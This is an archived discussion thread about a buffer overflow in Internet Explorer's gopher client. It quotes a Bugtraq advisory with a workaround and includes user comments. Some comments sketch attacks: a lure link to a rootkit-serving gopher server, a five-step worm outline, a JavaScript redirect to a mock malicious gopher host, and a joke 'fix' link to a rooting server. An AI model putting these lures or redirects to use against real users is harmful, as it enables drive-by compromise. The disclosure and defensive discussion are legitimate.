Latest IE Hole Lets Gopher Root You

rvaniwaa writes "Another hole in internet explorer has been discovered. This hole allows a hacker to root a user's computer whenever the user clicks on a gopher link. All versions of IE are affected and a Microsoft spokesman stated that the company is "moving forward on the investigation with all due speed""

Too damn obvious

[CaseyB]

Let the "gopher hole" jokes begin.

Re:Too damn obvious

[Jucius+Maximus]

Just one question:

Why the h3ll is anyone motivated to find bugs in IE's gopher protocols?!? It must have been a real slow day at Oy Online Solutions for them to find this.

New MS Hacker Slogan

"Where do you want to gopher today?"

Re:All three gopher links left..

[linderdm]

I agree that there may not be many gopher links that look like gopher links, but what stops the malicious from disquising their gopher links to look like regular hrefs?

well you can't expect...

[arson1]

Well you can't expect Microsoft to keep up with all these new technologies and formats!

The remedy

[sh0rtie]

To protect from potential exploiting, you can temporarily disable the gopher
protocol like this:

Go to Tools -> Internet options -> Connections. Click on "LAN settings".
Check "Use a proxy server for your LAN". Click on "Advanced...".

Go to the Gopher text field
and enter "localhost", and "1" in the port field. This will stop Internet
Explorer from showing and processing any gopher pages.

this will protect you for now, at least until M$ pull their finger out

Re:All three gopher links left..

[Simon+Brooke]

Speaking as a person who used to use gopher quite a bit - how many gopher links are left on the WWW? Three?

That really isn't the point. It would not take many minutes to put up a gopher server with a Win 32 rootkit as content, and then put an innocent but interesting looking link into a web page ('free live world cup scores' would do nicely just now) with an href pointing to that server, and, ideally, one of those annoying JavaScript scrollers in the browser status display to prevent the user from noticing they're about to click a gopher link, and, hey! That's a few more suckers rooted. It will probably go through most firewalls, too.

If you (or your organisation) still use Internet Explorer, I would treat this as serious. Change your default IE install to have gopher point to a safe machine of your own; block gopher at your firewall; and, ideally, switch to Opera 6, Netscape 6, or Mozilla as your organisation's default browser.

This isn't going to be the last security hole found in IE.

Re:Stats, anyone?

[sh0rtie]

Yep this site specialises in just that
Here

also George Guninski does some research here
Here

and Mr Malware
Here

Official Bugtraq Post

[PunchMonkey]

The Official Bugtraq Post:

OVERVIEW
========

Gopher is a protocol developed at the University of Minnesota in the
early 1990's. Gopher servers offer hierarchically organized directories
and files. These form a "gopherspace" which can be thought of as the
predecessor of the World Wide Web. Gopher was mostly abandoned soon after
HTTP and the World Wide Web started gaining popularity.

Microsoft Internet Explorer has a built-in gopher client. Gopher pages can
be accessed via URLs starting with "gopher://". The part of code in IE
which parses gopher replies contains an exploitable buffer overflow
bug. A malicious server may be used to run arbitrary code on an IE user's
system.

DETAILS
=======

When the overflow is triggered, a fixed sized buffer in stack gets
overwritten with data from the gopher server. This data can contain most
octets from 0 to 255 (also nulls) which makes it particularly easy to
inject a working shellcode in it. This is a traditional, trivially
exploitable buffer overflow. A test exploit has been successfully used to
run arbitrary code without user intervention with various IE versions and
systems including IE 5.5 and 6.0.

The attack can be launched via a web page or an HTML mail message which
redirect the user to a malicious gopher server when the victim views them.
The server can be very minimal, ie. a program that can listen on a TCP
port and write a block of data; a fully operational gopher server isn't
necessary in order to carry out the attack.

The exploiter could do anything that a regular user could do on the
system: retrieve, install, or remove files, upload and run programs, etc.

Full technical details aren't disclosed at this time to prevent
exploitation.

WORKAROUND
==========

Internet Explorer users can protect themselves from the flaw by disabling
the gopher protocol. Barely any gopher servers exist on the Internet
today, so this is unlikely to cause problems. If needed, a gopher client
or some other web browser can be used to access the gopherspace.

An easy way to disable processing and displaying gopher pages is to define
a non-functional gopher proxy in Internet Options. Select Tools ->
Internet options -> Connections. Click on "LAN settings". Check "Use a
proxy server for your LAN". Click on "Advanced...". Here you can define
proxy servers to be used with different protocols. Go to the Gopher text
field and enter "localhost", and "1" in the port text field. This will
stop Internet Explorer from fetching any gopher documents.

After installing the patch from Microsoft you can remove these gopher
proxy settings (or restore them to values they had before).

For more information and a vulnerability test see
http://www.solutions.fi

VENDOR STATUS
=============

Microsoft was contacted on May 20th. At the moment of writing this
advisory, Microsoft has started designing and coding a fix, but hasn't
given any approximation of when it would be released. The patch will be
available at

http://www.microsoft.com/technet/security/current. asp

when it is completed.

Active gopher sites.

[AJWM]

The last time I actually used a gopher site was about a year ago, some wire service was running it for its news stories.

However, a quicky search turns up several still-active gophers, for example:
gopher://gopher.umsl.edu/
gopher://gopher.cac.psu.edu/
(These actually return data -- some others I found the server up but no data returned).

As to why gopher died out, Tim Berners-Lee offers the following:

"It was just about this time, spring 1993, that the University of Minnesota decided that it would ask for a license fee from certain classes of users who wanted to use gopher. Since the gopher software being picked up so widely, the university was going to charge an annual fee. The browser, and the act of browsing, would be free, and the server software would remain free to nonprofit and educational institutions. But any other users, notably companies, would have to pay to use gopher server software.

"This was an act of treason in the academic community and the Internet community. Even if the university never charged anyone a dime, the fact that the school had announced it was reserving the right to charge people for the use of the gopher protocols meant it had crossed the line. To use the technology was too risky. Industry dropped gopher like a hot potato."

(from his book, Weaving the Web)

Re:All three gopher links left..

[kesuki]

nothing... a simple redirect page can force the gopher link to be opened without the user even being asked to click anything. Not to mention javascript. Anything that allows all those pop-up and pop-under ads can just as easily open a gopher link.

What the hell is this about?

[drew_kime]

A Microsoft spokesman who refused to be identified said Tuesday ...

And just why should we trust anything this guy says? Their official spokesman won't even stand by what he's saying. And what is he saying, anyway?

Refusing to confirm the security flaw, the Microsoft spokesman said the company "feel(s) strongly that speculating on the issue while the investigation is in progress would be irresponsible and counterproductive to our goal of protecting our customers' information."

And the spokesman added, "Responsible security researchers work with the vendor of a suspected vulnerability issue to ensure that countermeasures are developed before the issue is made public and customers are needlessly put at risk."

So again, as far as Microsoft is concerned, it's the fault of the people who publicized it. It's prudent to assume these guys are not the only ones who know about the problem. Which means my information is already at risk.

So if there are people out there who can compromise my system, why shouldn't I be able to find out about it and take preventive measures? Why should I have to wait until Microsoft -- who haven't even admitted to the vulnerability yet, two weeks after being told about it -- get around to fixing it?

Get Your Easy Fix Right Here!!!!

[kryzx]

It is really easy to fix this problem with this script I wrote. Just click on the link below to get it.

gopher://gopher.URr00t3d.ru

Re:Yay I'M SAFE!

[zulux]

The best thing about Windows?

It forced me to learn to spell 'administrator.'

Kinda like how FTP forced me to learn to spell 'anonymous.'

Or somthing.

Re:Wow...

[Gerv]

most imporatant of these that gopher is absolutly archaic.

<script>
document.location.replace("gopher://ev il.gopherser ver.com:7000/buffer_overflow/");
</script>

Second, as always, Microsoft will have a patch out fairly quickly, which is more that can be said for mozilla half of the time...

I'm amazed at how you split one security hole (XMLHTTPRequest) in two to make a "half the time"... :-)

Incidentally, the patch for XMLHTTPRequest was in nightly builds within 48 hours of the bug report, and in the next milestone within about a week. In contrast, there are currently 17 unpatched holes in IE. What was that you were saying about "quickly"?

Gerv

Even tho gopher is dead, this is a problem

[joshv]

Everyone keeps saying "but there are like three gopher servers left out there". This is not the point. Any buffer overflow in the IE client code which is exploitable is a huge problem. It doesn't matter that there are damned few servers left that use the exploitable protocol. A malacious server need not even be a fully functioning gopher server, it just needs to listen for requests on the right port and respond appropriately. A worm'ed IIS server could fit the bill quite nicely.

A smart worm could:
1. Infect an IIS server via some unfixed hole, or backdoor left by another worm.
2. Open up a dummy gopher port which responds to all requests with the exploit.
3. Replace links on the web site the IIS server serves with links to the gopher server exploit.
4. The worm installs itself on all client machines that click the gopher links and begins scanning for vunerable servers.
5. Goto 1.

None of this has anything to do with the number gopher servers left on the Internet.

-josh

Re:My thoughts:

[sphealey]

The existence of the exploit in the first place is troubling, but the *really serious* problem is #3, where almost nobody installs the patch until it is too late. Basically, Microsoft may not care as much about security as the security experts do, but the sad truth is that many users and even sysadmins care even less.

Well, yes. OTOH, you missed Step 3a, where the Microsoft patch breaks numerous mission-critical non-Microsoft applications. Office 97 SP2 was a classic here: Novell Netware clients never worked the same after that one was installed. Necessary for security I am sure. And NT SP6, which broke Lotus Notes.

You also missed step 2.9, where the hapless sysadmin spends 3 days trying to figure out Microsoft's patch dependency tree, which is not published. And even M$ admits that they use different, and incompatible, patch mechanisms for different product lines. So if I pull out the install disk to add an additional function to Visio, do I have to reinstall Office XP patches? Why or why not?

sPh